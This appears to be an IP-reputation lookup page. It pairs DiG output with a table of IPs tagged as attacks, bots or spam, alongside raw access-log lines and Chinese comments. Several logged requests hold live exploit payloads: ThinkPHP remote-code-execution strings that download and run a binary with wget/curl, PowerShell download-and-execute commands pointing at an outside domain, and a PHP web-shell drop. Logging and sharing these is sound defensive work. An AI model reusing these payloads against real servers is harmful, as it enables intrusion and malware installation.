City: unknown
Region: unknown
Country: unknown
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
| IP | Type | Details | Datetime |
|---|---|---|---|
| 139.227.190.186 | attack | Unauthorized connection attempt detected from IP address 139.227.190.186 to port 6656 [T] |
2020-01-27 05:03:04 |
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 139.227.190.9
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 25035
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;139.227.190.9. IN A
;; AUTHORITY SECTION:
. 566 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2022030803 1800 900 604800 86400
;; Query time: 68 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Mar 09 08:27:11 CST 2022
;; MSG SIZE rcvd: 106
Host 9.190.227.139.in-addr.arpa not found: 2(SERVFAIL)
;; Got SERVFAIL reply from 183.60.83.19, trying next server
Server: 183.60.82.98
Address: 183.60.82.98#53
** server can't find 9.190.227.139.in-addr.arpa: SERVFAIL
| IP | Type | Details | Datetime |
|---|---|---|---|
| 58.218.56.113 | attack | 58.218.56.113 - - [02/Apr/2019:07:40:20 +0800] "GET / HTTP/1.1" 301 228 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" 58.218.56.113 - - [02/Apr/2019:07:40:20 +0800] "GET /web/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F HTTP/1.1" 404 505 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" 58.218.56.113 - - [02/Apr/2019:07:40:21 +0800] "GET / HTTP/1.1" 301 228 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" 58.218.56.113 - - [02/Apr/2019:07:40:21 +0800] "GET /web/editor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F HTTP/1.1" 404 502 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" |
2019-04-02 11:05:01 |
| 123.125.71.49 | bots | baidu spider百度爬虫 |
2019-03-28 17:36:41 |
| 118.25.71.65 | attack | 攻击型IP 118.25.71.65 - - [31/Mar/2019:20:32:01 +0800] "PUT /FxCodeShell.jsp%20 HTTP/1.1" 400 682 "http://118.25.52.138:443/FxCodeShell.jsp%20" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.71.65 - - [31/Mar/2019:20:32:01 +0800] "PUT /FxCodeShell.jsp::$DATA HTTP/1.1" 400 682 "http://118.25.52.138:443/FxCodeShell.jsp::$DATA" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.71.65 - - [31/Mar/2019:20:32:01 +0800] "PUT /FxCodeShell.jsp/ HTTP/1.1" 400 682 "http://118.25.52.138:443/FxCodeShell.jsp/" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.71.65 - - [31/Mar/2019:20:32:01 +0800] "GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-03-31 20:42:33 |
| 138.197.77.207 | attack | 138.197.77.207 - - [01/Apr/2019:06:39:02 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://159.65.65.37/leet.x86;cat%20leet.x86%20%3E%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp HTTP/1.1" 301 194 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.30.1.el6.x86_64" 138.197.77.207 - - [01/Apr/2019:06:39:04 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://159.65.65.37/leet.x86;cat%20leet.x86%20%3E%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp HTTP/1.1" 404 209 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.30.1.el6.x86_64" 138.197.77.207 - - [01/Apr/2019:06:39:04 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://159.65.65.37/leet.x86;cat%20leet.x86%20%3E%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp HTTP/1.1" 301 194 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.30.1.el6.x86_64" |
2019-04-01 06:59:47 |
| 118.25.49.95 | attack | 118.25.49.95 - - [02/Apr/2019:20:00:02 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start%20C:/Windows/temp/lodhbrsdjsbwixa27329.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start C:/Windows/temp/lodhbrsdjsbwixa27329.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [02/Apr/2019:20:00:02 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [02/Apr/2019:20:00:02 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start%20C:/Windows/temp/lodhbrsdjsbwixa27329.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start C:/Windows/temp/lodhbrsdjsbwixa27329.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-02 20:03:22 |
| 58.251.121.186 | attack | 58.251.121.186 - - [01/Apr/2019:12:08:47 +0800] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.186 - - [01/Apr/2019:12:08:47 +0800] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 404 209 "http://118.25.52.138/phpMyAdmin/phpMyAdmin/index.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-01 12:11:03 |
| 5.188.210.57 | spam | wordpress垃圾评论,每天好多 5.188.210.57 - - [28/Mar/2019:17:37:49 +0800] "GET /index.php/page/869/ HTTP/1.0" 200 77511 "https://www.eznewstoday.com/index.php/page/869/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.3 6" 5.188.210.57 - - [28/Mar/2019:17:37:50 +0800] "GET /index.php/2019/02/01/stripe_2019_02_01_en/ HTTP/1.0" 200 41681 "https://www.eznewstoday.com/index.php/2019/02/01/stripe_2019_02_01_en/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML , like Gecko) Chrome/67.0.3396.62 Safari/537.36" 5.188.210.57 - - [28/Mar/2019:17:37:50 +0800] "POST /wp-comments-post.php HTTP/1.0" 302 4146 "https://www.eznewstoday.com/index.php/2019/02/01/stripe_2019_02_01_en/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/6 7.0.3396.62 Safari/537.36" |
2019-03-28 17:39:26 |
| 58.251.121.184 | attack | 58.251.121.184 - - [01/Apr/2019:07:47:17 +0800] "GET /ljb.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.185 - - [01/Apr/2019:07:47:17 +0800] "GET /db_cts.php HTTP/1.1" 404 209 "http://118.25.52.138/db_cts.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.184 - - [01/Apr/2019:07:47:17 +0800] "GET /ljb.php HTTP/1.1" 404 209 "http://118.25.52.138/ljb.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-01 08:05:15 |
| 40.87.64.218 | bots | 垃圾暴力破解 40.87.64.218 - - [29/Mar/2019:09:06:53 +0800] "GET /wp-login.php HTTP/1.1" 200 5139 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 40.87.64.218 - - [29/Mar/2019:09:06:53 +0800] "POST /wp-login.php HTTP/1.1" 200 5541 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 40.87.64.218 - - [29/Mar/2019:09:06:53 +0800] "POST /xmlrpc.php HTTP/1.1" 404 3693 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" |
2019-03-29 09:10:31 |
| 207.46.13.229 | bots | 微软bingbot |
2019-03-29 09:12:04 |
| 220.181.108.93 | bots | 百度爬虫,应该跟权重没关系 |
2019-03-28 17:34:14 |
| 42.236.10.153 | bots | 360爬虫,偶尔被GA认为是人类正常访问 |
2019-03-28 20:21:34 |
| 144.217.70.190 | attack | 144.217.70.190 - - [02/Apr/2019:09:51:04 +0800] "POST /xmlrpc.php HTTP/1.0" 404 468 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)" 144.217.70.190 - - [02/Apr/2019:09:51:05 +0800] "POST /xmlrpc.php HTTP/1.0" 404 468 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)" |
2019-04-02 10:21:51 |
| 42.236.55.21 | bots | 不常见的360爬虫。。 |
2019-03-29 10:37:48 |
| 220.181.108.90 | bots | 专爬图片的百度爬虫。。 |
2019-03-29 13:01:54 |